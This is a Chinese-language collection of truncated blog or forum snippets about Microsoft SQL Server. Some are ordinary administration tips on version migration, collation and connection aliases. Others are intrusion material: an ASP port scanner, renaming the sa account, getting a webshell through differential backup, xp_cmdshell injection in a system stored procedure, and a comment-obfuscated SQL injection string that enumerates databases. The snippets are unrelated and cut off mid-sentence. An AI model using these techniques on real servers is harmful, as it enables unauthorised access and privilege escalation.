2005转到2000的步骤1. 生成for 2000版本的数据库脚本2005 的manger studio-- 打开"对象资源管理器"(没有的话按F8), 连接到你的实例-- 右键要转到2000的库-- 任务-- 生成脚本-- 在"脚本向导"的"选择数据库"中, 确定选择的是要转到2000的库-- 勾选"为所选数据库中的所有对象编写脚本"-- 在接下来的"选择脚本选项"中, 找到"为服务器版本编写脚本"项, 选择"SQL Server&...

自己把以下代码保存为ASP文件。当然我还是一如既往的BS那些只改作者名字的家伙。 [code]<% '============ ASP Port Scanner by lake2 =================== 'http://lake2.0x54.org 'Version: 0.1 'For SpringBoard '==========================================================&nbs...

今天项目遇到一直不知道怎么解决，在经典网友以及无忧网友的热心帮助下，解决。比如A表：sid    sname1     kkkkkkd2     ahuinanB表id    smoney   sid1        100      12 ...

呵呵，前面说拉那么半天废话，可能你已经看的不耐烦拉，好，这就说道正题，大家跟着我来一起把sa给大卸八块首先打开SQL中的企业管理器，接着在工具选项卡中选择SQL server配置属性依次，点服务器设置，看到允许对系统目录直接进行修改前面的方框吗，点一下，好。再打开查询分析器，登陆进去（呵呵，随便你用什么帐号进去，不过可一定要在master数据库中有db_owner的权限）输入update sysxlogins set name='你要改成的名字' where sid=0x01update sysxlogins se...

1.--区分大小写 select * from a  where a=’AbCdE’ collate Chinese_PRC_CS_AI--区分大小写 select * from a  where a=’abCdE’ collate Chinese_PRC_CI_AI--不区分大小写 2.如果想让服务器上所有的存储表都区分大小写就需要在安装服务器时设置服务器的排序规则  或者 ...

MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码让系统执行了之后自动提升权限 或者添加管理员吗？ 答案当然可以了,kj021320测试了N次之后跟你说！那么我们得考虑文件摆放的位置~什么地方系统会运行呢？这个其实算是废话吧！大家不用想都知道 通用地方 C:\Documents and Settings\All Users\「开始」菜单\程序\启动呵呵位置有了！　那么我们备份什么文件让系统能执行的呢？这个是第一个关键点~！EXE JS ...

Infos: MSSQL自身存储过程的一个注入Author: 疯子[BCT]Date: 10/11/2007我看到MSSQL的存储过程中，有模有样的在过滤。 然后我就去读读他们的存储过程。就找到了一个注入而已。疯子如是说。漏洞资料如下：master..sp_resolve_logins存储过程中，对@dest_path参数过滤不严，导致xp_cmdshell注入。分析：[code]SELECT @dest_path = RTRIM(LTRIM(@dest_path)) -- If the&nbs...

MSSQL2005连接sql2000非默认端口数据库的问题给我折腾了快一天了，快疯了，连接TCP/IP默认1433端口没问题，连接其他端口数据库问题有了。SQL2005没有像SQL2000一样的客户端网络实用工具，基本上SQL2005算是把SQL2000里面的名字都改了，在网上找资料也没找到，只能一点点的试，终于发现了一个别名，欣喜的给我希望的“别名”。  具体位置是：开始-----SQL2005----配置工具----------SQLSERVERConfigurationManager---里的然后选中右键---新建别名出来了惊喜。如图：输入别名名称输入连接端口号输入服...

昨天在网上找资料的时间无意进了一个站，糊里糊涂就进去了，想提权提不起来，后来加上服务商的Q号想社工一下，射了半天得知服务器的安全是绿盟的人给做的 安全，后来就问猪猪有什么提权的方法没，他刚好做了这个动画就给发来过来，在网上查了一下找到了文章，一起拷贝过来.最近忙着学习很少关注这方面的东西， 落后了，落后了......下面是是在网上找到的资料和动画. TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的！既然如此就拿出来大家分享吧！MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码让系...

爆库语句，修改红色部分的数字挨个猜出库/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--爆表语句,som...

软件作者：kj021320信息来源：I.S.T.O技术团队（http://blog.csdn.net/I_S_T_O/）本来这文章在TEAM里面放了好久的了！只是<<art of sql injection>>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了！主要是MSSQL2005都来了！2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...正文:提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限...